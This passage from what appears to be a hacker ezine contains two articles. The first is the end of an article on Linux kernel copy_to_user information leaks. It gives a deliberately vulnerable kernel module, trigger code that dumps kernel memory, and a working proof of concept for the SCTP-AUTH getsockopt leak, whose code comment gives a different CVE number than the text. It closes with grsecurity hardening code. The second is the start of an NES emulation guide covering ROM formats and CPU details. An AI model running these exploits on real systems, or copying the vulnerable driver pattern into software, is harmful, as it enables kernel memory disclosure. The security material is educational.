+--> down_read <-------------+
| |
+--> get_user_pages |
| |
+--> is_global_init |
| | |
| +--> up_read |
| | |
| +--> congestion_wait |
| | |
| +-----------------------+
|
+--> kmap_atomic
|
+--> memcpy
|
+--> kunmap
|
+--> set_page_dirty_lock
|
+--> put_page
|
+--> up_read
|
+--> movsl_is_ok
|
+--> __copy_user
|
+--> __copy_user_intel



4] Kernel Information Leaks

The problem of this useful I/O function is that even a slight
miscalculation at the number of the requested bytes can result in a huge
leak from kernel memory. For example, an integer underflow which is later
used as a size request will result in almost arbitrary read from kernel
memory. This is neither a new vulnerability class nor a new concept.
In addition to this, information leak bugs cannot directly lead to
privilege escalation but in cases where the buggy code can literally GB
of kernel memory there is a great chance of finding useful information in
those. Those might include password entries, cryptographic keys etc. This
is why kernel level information leaks are treated as highly critical
vulnerabilities.
From attacker's point of view, kernel information leaks have also the
advantage of their effectiveness versus complexity. They're easy to spot
and in most cases trivial to exploit. The following sections will deal
with an sample bug and exploit as well as a real world one to demonstrate
the vulnerability.


4.1] Exploitation

Assuming the code of the following loadable kernel module (LKM), we can
easily deduce that there is an information leak vulnerability in the call
of copy_to_user routine.

------------------------------------------------------------------[snip]--------
/*
* Extremely simple character device driver to demonstrate
* copy_to_user() information leaks through IOCTL calls.
*
* by tping
*/

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/ioctl.h>
#include <linux/fs.h>
#include <asm/uaccess.h>

#define MAJOR_NUMBER 123
#define DEVFILE "
bug"

#define IOCTL_SET_LEN _IOR(MAJOR_NUMBER, 1, int)
#define IOCTL_GET_LEAK _IOW(MAJOR_NUMBER, 2, char *)

static size_t len = 0;
static unsigned int opened = 0;
static char *ptr = "
blah";

/* prototypes */
static int open_the_bug(struct inode *, struct file *);
static int close_the_bug(struct inode *, struct file *);
int ioctl_handler(struct inode *, struct file *, unsigned int, unsigned long);
int __init start_the_bug(void);
void __exit kill_the_bug(void);

struct file_operations fops = {
.open = open_the_bug,
.release = close_the_bug,
.ioctl = ioctl_handler,
};

static int
open_the_bug(struct inode *in, struct file *fp)
{
if (opened)
return -EBUSY;

opened++;
try_module_get(THIS_MODULE);
return 0;
}

static int
close_the_bug(struct inode *in, struct file *fp)
{
opened = 0;
module_put(THIS_MODULE);
return 0;
}

int
ioctl_handler(struct inode *in, struct file *fp,
unsigned int cmd, unsigned long args)
{
ptr = kmalloc(12, GFP_KERNEL);

switch (cmd) {
case IOCTL_SET_LEN:
if (get_user(len, (char __user *)args))
return -EFAULT;
printk(KERN_INFO "
len is now %u\n", len);
break;
case IOCTL_GET_LEAK:
printk(KERN_INFO "
Leaking from 0x%p to 0x%p\n", ptr, (void *)args);
if (copy_to_user((void __user *)args, ptr, len))
return -EINVAL;
break;
default:
break;
}

return len;
}

int __init
start_the_bug(void)
{
int ret = register_chrdev(MAJOR_NUMBER, DEVFILE, &fops);
if (ret < 0)
return ret;

printk(KERN_INFO "
Bug is up and running...\n" \
"
Just execute: mknod /dev/%s c %d 0\n", DEVFILE, MAJOR_NUMBER);

return 0;
}

void
kill_the_bug(void)
{
printk(KERN_INFO "
Bye bye little bug\n");
unregister_chrdev(MAJOR_NUMBER, DEVFILE);
}

module_init(start_the_bug);
module_exit(kill_the_bug);

MODULE_AUTHOR("
tping");
MODULE_DESCRIPTION("
dummy nfoleak bug");
MODULE_LICENSE("
GPL");

------------------------------------------------------------------[snip]--------

Keep an eye on your /var/log/kern.log and just insert the above kernel
module to the running kernel like this:

root:~# make -C /lib/modules/`uname -r`/build M=${PWD} modules
make: Entering directory `/usr/src/linux-2.6.29'
CC [M] /root/bug.o
Building modules, stage 2.
MODPOST 1 modules
CC /root/bug.mod.o
LD [M] /root/bug.ko
make: Leaving directory `/usr/src/linux-2.6.29'
root:~# insmod bug.ko
root:~#

Now, on your kernel warning log files you should see something similar to
this:

galvatron kernel: Bug is up and running...
galvatron kernel: Just execute: mknod /dev/bug c 123 0

Just do what it says and in addition to that make sure that this file
readable in order to be accessible to the unprivileged users that will
attempt to abuse it. So...

root:~# mknod /dev/bug c 123 0
root:~# chmod 0644 /dev/bug
root:~# ls -l /dev/bug
crw-r--r-- 1 root root 123, 0 2009-05-28 04:32 /dev/bug
root:~#

The last step is to code a tiny application that calls the driver's IOCTL
commands and hopefully leaks some kernel data to the user space. Here is
a simple trigger code for that driver.

------------------------------------------------------------------[snip]--------

/*
* Example trigger code for copy_to_user
* information leak demonstration.
*
* by tping
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/mman.h>
#include <sys/ioctl.h>

#define IOCTL_SET_LEN _IOR(123, 1, int)
#define IOCTL_GET_LEAK _IOW(123, 2, char *)
#define EVIL_SIZE 12
#define DEVICE "
/dev/bug"
#define DATAFILE "
huhu.dump"
#define FAIL -1

void
fail(int s)
{
exit(EXIT_FAILURE);
}

int
main(int argc, char *argv[])
{
int fd1, fd2;
size_t leak = EVIL_SIZE;
char *ptr;
int len = 0;

signal(SIGSEGV, fail);

if (argc == 2)
leak = atoi(argv[1]);

if ((fd1 = open(DEVICE, O_RDONLY)) == FAIL)
{
fprintf(stderr, "
[-] Unable to open %s\n", DEVICE);
exit(EXIT_FAILURE);
}
fprintf(stdout, "
[+] Opened %s\n", DEVICE);

ioctl(fd1, IOCTL_SET_LEN, &leak);
fprintf(stdout, "
[+] Set len to %u\n", leak);

ptr = mmap(NULL, leak, PROT_READ | PROT_WRITE, \
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (ptr == NULL)
{
fprintf(stderr, "
[-] Unable to allocate %u bytes\n", leak);
exit(EXIT_FAILURE);
}
fprintf(stdout, "
[+] Allocated %u bytes at %p\n", leak, ptr);

if ((fd2 = open(DATAFILE, O_RDWR | O_CREAT | O_TRUNC, 0666)) == FAIL)
{
fprintf(stderr, "
[-] Unable to open %s\n", DATAFILE);
exit(EXIT_FAILURE);
}
fprintf(stdout, "
[+] Opened %s\n", DATAFILE);
fprintf(stdout, "
[+] Attempting to leak...\n");

len = ioctl(fd1, IOCTL_GET_LEAK, ptr);
if (len == -1)
{
fprintf(stdout, "
[-] Fail\n");
exit(EXIT_FAILURE);
}

if (write(fd2, ptr, len) == -1)
{
perror("
[-] Dumping the data");
exit(EXIT_FAILURE);
}
close(fd1);
close(fd2);
free(ptr);
return 0;
}

------------------------------------------------------------------[snip]--------

An unprivileged user can obtain kernel memory because of this insecure
usage of copy_to_user simply by invoking the IOCTL commands as shown in
the above code. For example...

tping:~$ gcc -Wall abuse_it.c -o abuse_it
tping:~$ ./abuse_it 120
[+] Opened /dev/bug
[+] Set len to 120
[+] Allocated 120 bytes at 0x5606c000
[+] Opened huhu.dump
[+] Attempting to leak...
tping:~$ ls -l huhu.dump
-rw-r--r-- 1 tping tping 120 2009-05-28 04:47 huhu.dump
tping:~$ hexdump -C huhu.dump
00000000 d0 56 43 f7 cc 2d 85 f8 34 09 43 f7 00 00 00 00 |.VC..-..4.C.....|
00000010 a8 56 43 f7 4c 6a 48 f7 00 03 00 00 00 00 00 00 |.VC.LjH.........|
00000020 60 00 2e f7 40 92 4f f7 c9 50 87 c0 94 01 7c f7 |`...@.O..P....|.|
00000030 94 01 7c f7 00 00 00 00 00 00 00 00 ff ff ff ff |..|.............|
00000040 00 01 00 00 00 90 8b f7 20 b8 8c f6 00 b8 8c f6 |........ .......|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000060 c8 4f 87 c0 de 4f 87 c0 d4 4f 87 c0 2c cf 80 c0 |.O...O...O..,...|
00000070 00 00 00 00 00 00 00 00 |........|
00000078
tping:~$

And your kernel log file responsible for the warning level messages will
have some information from our driver.

galvatron kernel: len is now 120
galvatron kernel: Leaking from 0xf6e42e00 to 0x5606c000

This is just an example to demonstrate the vulnerabilities that can
occur from a seemingly innocent I/O routine. Depending on the kernel
configuration and the susceptible kernel code those information leaks can
result in up to giga-bytes of kernel memory being leaked. Clearly with a
huge security impact. In addition to miscalculations that lead to such
situations, another popular mistake is when the attacker is able to
influence some allocation in the kernel side using kmalloc() in order to
request 0 bytes to be allocated. In the majority of the kmalloc() return
value checks the code looks like:

some_ptr = kmalloc(some_len, GFP_KERNEL);
if (!some_ptr)
return -ENOMEM;

Even though this looks accurate, kmalloc treats zero allocation in a
special way, different than any other allocation. That is, it does not
return a NULL pointer, but instead it returns ZERO_SIZE_PTR. You can
verify this fairly easily by a quick look at include/linux/slab_def.h,
include/linux/slub_def.h or include/linux/slob_def.h where kmalloc is
defined (depending on the allocator) and has a check for zero allocations.

------------------------------------------------------------------[snip]--------

include/linux/slub_def.h:
212 static __always_inline void *kmalloc(size_t size, gfp_t flags)
213 {
...
218 if (!(flags & SLUB_DMA)) {
219 struct kmem_cache *s = kmalloc_slab(size);
220
221 if (!s)
222 return ZERO_SIZE_PTR;
223
224 return kmem_cache_alloc(s, flags);
225 }
...
228 }

include/linux/slab_def.h:
31 static inline void *kmalloc(size_t size, gfp_t flags)
32 {
33 if (__builtin_constant_p(size)) {
34 int i = 0;
35
36 if (!size)
37 return ZERO_SIZE_PTR;
...
56 }

include/linux/slob_def.h:
26 static inline void *kmalloc(size_t size, gfp_t flags)
27 {
28 return __kmalloc_node(size, flags, -1);
29 }

mm/slob.c:
462 void *__kmalloc_node(size_t size, gfp_t gfp, int node)
463 {
...
467 if (size < PAGE_SIZE - align) {
468 if (!size)
469 return ZERO_SIZE_PTR;
...
487 }

------------------------------------------------------------------[snip]--------

And that constant being returned (ZERO_SIZE_PTR) can bypass checks like:

if (!ptr)

Since its value is a pointer to 16 as we can read from include/linux/slab.h
Even though kfree() handles this special pointer exactly the same as with
NULL, it can lead to information leaks (as well as pointer dereferences but
this is off topic) because of its value and since most developers will only
check for NULL being returned.


4.2] CVE-2008-3792: SCTP-AUTH API

 CVE-2008-3792 is a bug which was released  by Tobias Klein  on 9 September  
2008 and affects Linux kernel prior to 2.6.26.4 [4]. Tobias Klein wrote an
excellent analysis of this vulnerability. But here is a quick outline of
the buggy IOCTL call.

------------------------------------------------------------------[snip]--------

5175 SCTP_STATIC int sctp_getsockopt(struct sock *sk, int level, int optname,
5176 char __user *optval, int __user *optlen)
5177 {
5178 int retval = 0;
5179 int len;
...
5197 if (get_user(len, optlen))
5198 return -EFAULT;
...
5303 case SCTP_HMAC_IDENT:
5304 retval = sctp_getsockopt_hmac_ident(sk, len, optval, optlen);
5305 break;
...
5323 return retval;
5324 }

------------------------------------------------------------------[snip]--------

The length argument passed to sctp_getsockopt_hmac_ident() is completely
user controlled from line 5197. Now, the latter function include this
code:

------------------------------------------------------------------[snip]--------

5053 static int sctp_getsockopt_hmac_ident(struct sock *sk, int len,
5054 char __user *optval, int __user *optlen)
5055 {
5056 struct sctp_hmac_algo_param *hmacs;
...
5059 hmacs = sctp_sk(sk)->ep->auth_hmacs_list;
5060 param_len = ntohs(hmacs->param_hdr.length);
5061
5062 if (len < param_len)
...
5066 if (copy_to_user(optval, hmacs->hmac_ids, len))
5067 return -EFAULT;
...
5070 }

------------------------------------------------------------------[snip]--------

A malicous user can specify a length argument which bypasses the check at
line 5062 and reaches the copy_to_user() routine which can result in an
information leak situtation as it is described earlier in this document.
Here is a simple proof of concept code for this vulnerability.

------------------------------------------------------------------[snip]--------

/*
* Simple PoC code for CVE-2008-4113
* by tping
*/


#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>

#define PROCFILE "/proc/sys/net/sctp/auth_enable"
#define SCTP_HMAC_IDENT 22
#define LEAK_SIZE 0x20000
#define OUTFILE "sctp-auth.dmp"

void
check_sctp_auth()
{
/*
* Unfortunately there is no SCTP_NET_AUTH_ENABLE
* sysctl to check this directly using a common
* sysctl(2) call. I'm checking it through procfs.
* Not such realiable since it might be -r to us.
*/

char buf[10];
int fd = open(PROCFILE, O_RDONLY);
if (fd == -1)
{
printf("[-] SCTP-AUTH detection failed.\n" \
" [*] Continuing anyway...\n");
return;
}

memset(buf, 0, sizeof(buf));
if (read(fd, buf, 3) == -1)
{
printf("[-] SCTP-AUTH detection failed.\n" \
" [*] Continuing anyway...\n");
return;
}
if (buf[0] == '0' && buf[1] == '\n')
{
printf("[-] SCTP-AUTH Disabled.\n");
exit(EXIT_FAILURE);
}
else if (buf[0] != '0' && buf[1] == '\n')
{
printf("[+] SCTP-AUTH Enabled!\n");
return;
}

close(fd);
return;
}

int
main(int argc, char *argv[])
{
check_sctp_auth();

int fd = -1;
void *ptr;
size_t leak = LEAK_SIZE;

if (argc > 1)
leak = atoi(argv[1]);

ptr = mmap(NULL, leak, PROT_READ | PROT_WRITE, \
MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED)
{
perror("[-] Memory mapping failed");
exit(EXIT_FAILURE);
}
memset(ptr, 'X', leak);
printf("[+] Got space for %u bytes at 0x%08x\n", leak, ptr);

if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) == -1)
{
perror("[-] SCTP socket");
exit(EXIT_FAILURE);
}
printf("[+] SCTP is ready.\n");

if (getsockopt(fd, SOL_SCTP, SCTP_HMAC_IDENT, ptr, &leak) == -1)
{
perror("[-] Infoleak failed");
exit(EXIT_FAILURE);
}
printf("[+] You got your kernel data...\n");

close(fd);
if ((fd = open(OUTFILE, O_RDWR | O_CREAT | O_TRUNC, 0666)) == -1)
{
perror("[-] Dumping to file");
exit(EXIT_FAILURE);
}
printf("[+] Dumping data to file %s\n", OUTFILE);

if (write(fd, ptr, leak) == -1)
{
perror("[-] Dumping the data");
exit(EXIT_FAILURE);
}

close(fd);
munmap(ptr, leak);
printf("[+] Well done.\n");

return 0;
}

------------------------------------------------------------------[snip]--------

The only difference from the example buggy code presented at section 4.1
was roughly that this code was dealing with an option that could be
disabled (net.sctp.auth_enable) and it had to perform an additional check
for this. The rest of the code performs almost the exact same tasks as
the previous one. Of course, here the leak is through getsockopt(2) system
call where on the previous example was through an ioctl(2) call.


5] Fixing the bug

So is this a bug? It definitely looks like a design flaw, and in fact it
will be patched (or at least hardened) by spender at one of his patches [5]
for grsecurity. In his patch, a new reporting function is added for
copy_to_user() information leaks like this:

------------------------------------------------------------------[snip]--------

void pax_report_leak_to_user(const void *ptr, unsigned long len)
{
printk(KERN_ERR "PAX: kernel memory leak attempt detected from %p (%lu bytes)\n", ptr, len);
dump_stack();
do_group_exit(SIGKILL);
}

------------------------------------------------------------------[snip]--------

This is added in fs/exec.c and __copy_to_user() gets patched to include a
new check which is shown below.

------------------------------------------------------------------[snip]--------

}
+ if (!__builtin_constant_p(n))
+ check_object_size(from, n, true);
return __copy_to_user_ll(to, from, n);
}

------------------------------------------------------------------[snip]--------

This check_object_size() is also a new function added in mm/slab.c and it
is used to identify that the size of buffer 'from' is more than the
requested bytes to be copied. Here is his code:

------------------------------------------------------------------[snip]--------

void check_object_size(const void *ptr, unsigned long n, bool to)
{
struct page *page;

if (!n)
return;

if (ZERO_OR_NULL_PTR(ptr))
goto report;

if (!virt_addr_valid(ptr))
return;

page = virt_to_head_page(ptr);

if (!PageSlab(page))
/* TODO: check for stack based ptr */
return;

size = obj_size(virt_to_cache(ptr));
if (n > size)
goto report;

/* TODO: figure out how to find beginning of object if ptr is inside one */
return;

report:
if (to)
pax_report_leak_to_user(from, n);
else
pax_report_overflow_from_user(from, n);
}
EXPORT_SYMBOL(check_object_size);

------------------------------------------------------------------[snip]--------

It would be ridiculus to describe all of the above routines since this is
just a reference to a possible fix. This code is used to handle both
copy_to_user() infoleaks and copy_from_user() overflows as you can see
from the correponding report functions at the boolean variable 'to' which
if is set to true it represents that this is a copy_to_user() and on false,
a copy_from_user(). Of course, the Linux kernel developers have never even
attempted to perform something like the above fix that spender did. :-P


6] Conclusion

Nowadays, the use of this routine is limited to specific operations which
can be easily audited for such security bugs. Nevertheless, there are
still some similar cases in various kernel codes. Of course, even though
information leaks usually cannot lead into direct privilege escalation,
they can definitely assist on a complete compromise or any further
exploitation.


7] References

1] Kernel-Level Exception Handling
http://tldp.org/LDP/khg/HyperNews/get/devices/exceptions.html

2] 2.6.29 Linux kernel source code
http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.29.tar.gz

3] Preemption under Linux
http://kernelnewbies.org/FAQ/Preemption

4] Linux Kernel SCTP-AUTH API Information Disclosure
Vulnerability and NULL Pointer Dereferences
http://trapkit.de/advisories/TKADV2008-007.txt

5] copy_*_user GRSecurity protection
http://www.grsecurity.net/~spender/copy_tofrom_user_protection_26.diff



[==============================================================================]
[--------------[ The Software Emulation of the NES Architecture ]--------------]
[==============================================================================]

_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/ _`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>"<######
*#########( )####*
##########>.<#####
################ qeed
*############*
"
T######T"


--------------------[Table of Contents]-----------------------------------
I. Introduction
II. ROMs/INES/UNIF
III. CPU (Central Processing Unit)
IV. PPU (Picture Processing Unit)
V. APU (Audio Processing Unit)
VI. Miscellaneous
VII. Thanks
--------------------------------------------------------------------------

I. Introduction

This document is intended to introduce the basics of the NES
architecture, with the main focus on how to emulate such a console on the
software side. Supplementary links will be provided at the end for
anyone who wanted the hardware side of the NES. The code and optimization
tricks presented in this article will be mainly C and assembly,
although it should be easily ported to other languages. The information
in this article will try to cover the base NES hardware,
and only the base. The peripherals will be provided external links
for those who wish to learn more. The reasons I wanted to write this
document was to cover all the latest information that was discovered
over the years about the NES. Many of documents about the NES nowadays
are sorely outdated, and some even outright wrong. I want to give thanks
to the people such as Brad Taylor, blargg, kevtris, loopy,
quietust, disch, and the all the other members of the NESDEV community
for writing about and discovering all the new things about the NES.
Emulation couldn't have been this accurate without all of
your contributions!

--------------------------------------------------------------------------

II. ROMs/INES/UNIF

First and foremost, the main use of console emulators besides the
intellectual pursuit is to play video games. ROMs are the back up images
you get from the game board that has been dumped by a cartridge reader,
for the NES, the main dumper is the CopyNES. Now due to the NES limited
hardware, the NES game cartridge contains extra hardware that extends the
capabilities of the NES hardware, such as sound chips, RAM,
and banks that allow more ROM space for code. These extra hardware add-ons
can be controlled by writing to memory-mapped registers, and each hardware
cartridge had different registers. Of this fact, the INES header was born.

The INES header was a format invented by Marat Fayzullin
to classify the type of cartridge one would be reading when
opening the ROM file. The current INES specification is 16 bytes of
header file, following then the optional trainer if the file has one,
a small chunk of code for a cheat screen mainly,
the PRG-ROM, the game code, and then the CHR-ROM, the graphics data,
at the end there is also the playchoice (8kb of hint screen)
at the end after CHR-ROM if the flag for it is set.

The UNIF format was created later to provide more accurate information
about the game cartridge, using full board names of the cartridge instead
of assigning a number for it, it is also a chunked format based, allowing
alot more flexibility in updating the standard, though UNIF never widely
caught on, and most dumped games uses the INES header format, so for
emulating the NES, implementing INES should be sufficient for most games.
The game cartridge are classified with "
mapper" numbers in INES and
board names in UNIF.

+++++++++++++++++++++++++INES header++++++++++++++++++++++++++++++++++++++

Here is the INES data format taken from nesdevwiki:

header[0, 3] = "
NES\x1a" the header string identifying a INES ROM. the 0x1A
is the MS-DOS end of line terminator.

header[4] = The number of PRG-ROM inside the file (0x4000 * header[4])
bytes.

header[5] = The number of CHR-ROM inside the file (0x2000 * header[5])
bytes.

header[6] =
76543210
||||||||
||||+||+- 0xx0: horizontal mirroring; 0xx1: vertical mirroring;
1xxx: four-screen mirroring
|||| |+-- 1: SRAM in CPU $6000-$7FFF, if present, is battery backed
|||| +--- 1: 512-byte trainer at $7000-$71FF (stored before PRG data)
++++----- Lower nybble of mapper number

header[7] =
76543210
|||| ||
|||| |+- VS Unisystem
|||| +-- PlayChoice-10 (8KB of Hint Screen data stored after CHR data)
++++----- Upper nybble of mapper number

header[8] = Size of PRG RAM in 8 KB units
(Value 0 implies 8 KB for compatibility; see PRG RAM circuit)

header[9] =
76543210
||||||||
|||||||+- TV system (0: NTSC; 1: PAL)
+++++++-- Reserved, set to zero
Not alot of emulator adheres to this, and many if not all
ROMs dumped do not use this flag.

header[10] =
76543210
|| ||
|| ++- TV system (0: NTSC; 2: PAL; 1/3: dual compatible)
|+----- SRAM in CPU $6000-$7FFF is 0: present; 1: not present
+------ 0: Board has no bus conflicts; 1: Board has bus conflicts
header[10] is unofficial from the INES spec, if you want to adhere
to the spec, treat header[10] as unused (zero-filled).

header[11,15] are unused (zero-filled).

After this, there is a 512 bytes trainer if bit 2 of header 6 is set,
and then header[4] * 16384 bytes of PRG-ROM,
then header[5] * 8192 of CHR-ROM, and 8192 bytes of PlayChoice-10 data
at after the CHR-ROM.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++UNIF Header Format++++++++++++++++++++++++++++++++++

Here is the UNIF header format taken from nesdevwiki:
header[0, 3] = "
UNIF" identifer

header[4, 7] = What version of the UNIF we are dealing with

header[8, 31] = Reserved.

From then there is string identfiers saying what data comes next
here is the chunk idenfitier format.

00-03: Chunk ID string, ASCII text
04-07: Chunk data length, DWORD
08-..: Chunk data

Here is the string identifier in alphabetical format:

"
BATR"
Length=1 byte
Revision=5
Recommended in file
Indicates that the board contains a battery used to
preserve the contents of its expansion RAM.

"
CCK#" where # is a number
Length=4 bytes
Revision=5
Optional in the file
"
CCK0" to "CCKF" contains CRC32 checksums which
verifies if the data has been dumped properly.

"
CHR#" where # is a number
Length=variable size
Revision=4
"
CHR0" is required, all others are optional, only if the game has CHR-ROM.
"
CHR0" to "CHRF" contain the CHR-ROM data of the game cartridge.
If more than 1 CHR ROM chip is present on the cartridge board,
one chunk should be used for each chip, arranged in the logical order
in which they are addressed via the mapper hardware.
Most cartridges will only use "
CHR0".


"
CTRL"
Length=1 byte
Revision=7
Optional in the file.
A bitfield containing information about the controllers used by
the game.
* Bit 0: Regular Joypad
* Bit 1: Zapper
* Bit 2: R.O.B
* Bit 3: Arkanoid Controller
* Bit 4: Power Pad
* Bit 5: Four-Score adapter
* Bit 6: (expansion)
* Bit 7: (expansion)

"
DINF"
Length=204 bytes
Revision=2
Optional in the file
This tells you who dumped the block
100 bytes - NULL-terminated string of the name of the person who dumped it.
1 byte - dump date (day)
1 byte - dump date (month)
2 byte - dump date (year)
100 bytes - NULL-terminated string of software used to dump it


"
NAME"
Length=variable
Revision=1
Optional in file
NULL-terminated string of the name of the game.

"
MAPR"
Length=variable size
Revision=1
Required in the file
The data is a NULL-terminated string describing
what boards are used, for more accuracy than the INES
mapper numbers.

"
MIRR"
Length=1 byte
Revision=5
Recommended in file
Describes how name tables is configured, because in many
cases, the board name alone cannot indicate what name table
configuration is used.
The byte value indicates the mirroring.
0 - Horizontal Mirroring
1 - Vertical Mirroring
2 - Mirror All Pages From $2000
3 - Mirror All Pages From $2400 (deprecated, as it is
indistinguishable from option 2 above)
4 - Four Screens of VRAM
5 - Mirroring Controlled By Mapper Hardware
(necessary for some MMC3 boards)

"
PCK#" where # is a number
Length=4 bytes
Revision=5
Optional in the file
This is CRC32 checksum for the "
PRG#" data to see
if they match.

"
PRG#" where # is a number
Length=variable
Revision=4
"
PRG0" is required, all other are optional
"
PRG0" to "PRGF" contain the PRG-ROM data of the game cartridge.
If more than 1 PRG ROM chip is present on the cartridge board,
one chunk should be used for each chip, arranged in the logical order
in which they are addressed via the mapper hardware.
Most cartridges will only use "
PRG0".

"
READ"
Length=variable size
Revision=1
Optional in the file
This is extra content in the file, such as
who dumped it, credits, greets, or anything of the sort.

"
TVCI"
Length=1 byte
Revision=6
Recommended in the file
This tells you the TV compatibility
0 in the byte for NTSC (60 Hz)
1 in the byte for PAL (50 Hz)
2 in the byte is for multi region.

"
VROR"
Length=1 byte
Revision=5
Optional in file
Indicates that a mapper which normally supports only CHR ROM
is being made to use CHR RAM instead,
intended for homebrew games which use boards
such as NES-NROM-256 or NES-MHROM with CHR RAM instead of CHR ROM.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

For the current specs of the INES and UNIF header format, visit
http://nesdevwiki.org/wiki/INES
http://nesdevwiki.org/wiki/UNIF

--------------------------------------------------------------------------

--------------------------------------------------------------------------

III. CPU (Central Processing Unit)

The NES hardware came in 2 formats, NTSC and PAL.
The NTSC CPU is clocked at ~1.789772 MHz using the Ricoh 2A03,
a MOS 6502 implementation, while the PAL is clocked at ~1.662607 MHz
Ricoh 2A07 which is also a MOS 6502 implementation. The CPU's clock is
obtained by dividing a 21.477272 MHz master clock source by 12
(26.601712 MHz divided by 16 for PAL). The only difference from the
MOS 6502 is the NES didn't have a decimal mode. For those that don't know,
the NES is little endian.

++++++++++++++++++++++++++Registers+++++++++++++++++++++++++++++++++++++++

The M6502 is a very simple 8 bit CPU, with a few registers
for operations, all of size 8 bit, except for the program counter.
Here are the registers:

The Accumulator:
The accumulator is mainly used for math operations, since it is the
only register with opcodes that allow addition and subtraction to.

The X and Y register:
They are general purpose registers used for loops or moving data,
they are also used to implement pointers in the NES.

The Stack Pointer:
The stack pointer is an index used to keep track of where it is in
the stack range. The Stack pointer wraps around to 0xFF if a push happens
when it is 0x00 and the other way around when a pop happens.

The Status Flag:
The status flag keeps track of the CPU state, such when there was an
arithmetic overflow, or the last operation obtained 0 to a register.
It is mainly used to implement conditional branches and mask IRQs.

Here is the bit inder for the status flag:

==========================

Carry (0x01):
Set when addition carries or subtraction carries, the shift
instructions also use this bit, and the compare instruction uses it too,
and some undocumented opcodes.

Zero (0x02):
Set when A, X, or Y operation gave a value of 0 to
one of those registers, unset when it is not 0.

Interrupt (0x04):
Set when it is in interrupt, when this is set, the other
interrupts are masked.

Decimal Mode (0x08):
Unused, NES doesn't have decimal mode, but the opcodes CLD and SED
still sets the flag as normal, just that the other operations doesn't
care if the decimal is set or not.

BRK (0x10):
Not really a flag, since can't be manually set, set when the BRK
instruction is used.

Unused (0x20):
Not really a flag, since can't be manually set, set when the the
status register gets pushed onto the stack.

Overflow (0x40):
Set on signed overflow. For example, when negative + negative equals
positive, positive + positive equals negative.

Sign (0x80):
Set when A, X, or Y operation gave a value that has 7th bit (0x80)
set, clear otherwise.

===========================

The Program Counter: The program counter is a 16 bit register used to keep
track of where the CPU is executing the opcodes, it wraps around to 0, if
it passes the 0xFFFF mark.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++++CPU Memory Map+++++++++++++++++++++++++++++++++++

Each element in the address are 8 bits wide (byte).

RAM: [0, 0x1FFF]
The address lines 0x800-0x1FFF is mirrored with 0-0x7FF,
thus the RAM is really RAM[index & 0x7FF] when accessing RAM[0-0x1FFF].

Zero Page: [0, 0xFF]
This address lines is one of the most used address space in the NES,
due to opcodes existing that deal specifically with this space. It saves
a cycle count (Since it doesn't need to get the high byte of the
program counter) for the instructions, for a limited console such as
the NES, every cycles counts.

Stack: [0x100, 0x1FF]
This is where the stack instructions push/pops the data in the 6502,
the index (stack pointer register) wraps around when a push or pop is
greater than than the defined range.

PPU: [0x2000, 0x3FFF] [0x4014]
These are memory mapped registers to interact with the PPU, they are
used to read the PPU status, and to read/write memory to. They will be
covered more in detailed in the PPU section. They are mirrored every
8 bytes so assuming the addr[0] is 0x2000 and on, the access operation
will be it will be addr[index & 0x07]. The 0x4014 address
is used for quick transferring of 256 bytes (DMA) to the sprite memory
space covered in the PPU section.

APU: [0x4000, 0x4017] aside from [0x4016] and [0x4014]
These are memory mapped registers to interact with the APU, such as
setting frequency or volume. These will be covered more in depth in the
APU section.

Various: [0x4018, 0x7FFF]
These are open bus, unless the game cartridge has hardware that maps
to these registers. Generally, if a game does, 0x4018 to 0x5FFF
are memory mapped addresses, and the 0x6000 to 0x7FFF is usually
the extra RAM and that space is usually the save RAM on the cartridge.
Each different game cartridge has different mappings, so don't take what
I just said to be exact for all games.

Note about CPU open bus:
Open bus is registers which haven't been implemented. Some games uses
open bus to hinder playability on pirate NES, due to implementation
differences. Writing to open bus does nothing, while reading from open bus
returns the byte last on the bus. The open bus behavior is different than
the PPU/APU.
=====================
Example:
LDA $5000 (load accumulator with the value at address 0x5000),
because the NES is little endian, 0x50 will be read last. Thus the
accumulator will be 0x50 after the instruction.

======================

PRG-ROM: [0x8000, 0xFFFF]
This is the game code that is mapped from the ROM file we load
into this range.
Due to the limited ROM space that could map here, most games
have bankswitching support by writing to a memory mapped register.

RESET Vector: [0xFFFC-0xFFFD]
The RESET address that the PC uses on startup and on
reset triggered by the reset button on the NES.
Example: PC = mem_read(0xFFFC)|(mem_read(0xFFFD)<<8);

NMI Vector: [0xFFFA-0xFFFB]
The NMI (Non Maskable Interrupt) address that the NMI handler read
from to get the address to the NMI code.
Example: PC = mem_read(0xFFFA)|(mem_read(0xFFFB)<<8);

IRQ Vector: [0xFFFE-0xFFFF]
The IRQ (Interrupt ReQuest) address is where the
IRQ handler read from to get the address to the IRQ code.
Example: PC = mem_read(0xFFFE)|(mem_read(0xFFFF)<<8);

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++Power-up State++++++++++++++++++++++++++++++++

Power-up State: The power up state is different with each NES,
and therefore, no standard can be reached. However, a power state has
been recorded on a real NES, while it is not the official, it does show
a sample of what would a real NES power up state be. You can find it at:

http://nesdevwiki.org/wiki/Power-up_state_of_PPU
http://nesdevwiki.org/wiki/Power-Up_State

Generally, most emulators nowadays set them close to the power state
documented above, whereas old emulators zero them out. A note of use,
reflect what you have in the power-up state, in the P register,
that is if you have 0 in flags A, X, or Y, set the Z flag.
The stack pointer should be set by games on startup, generally in the form
of ( LDX #$FF; TXS; ) so you can leave it to whatever value you want,
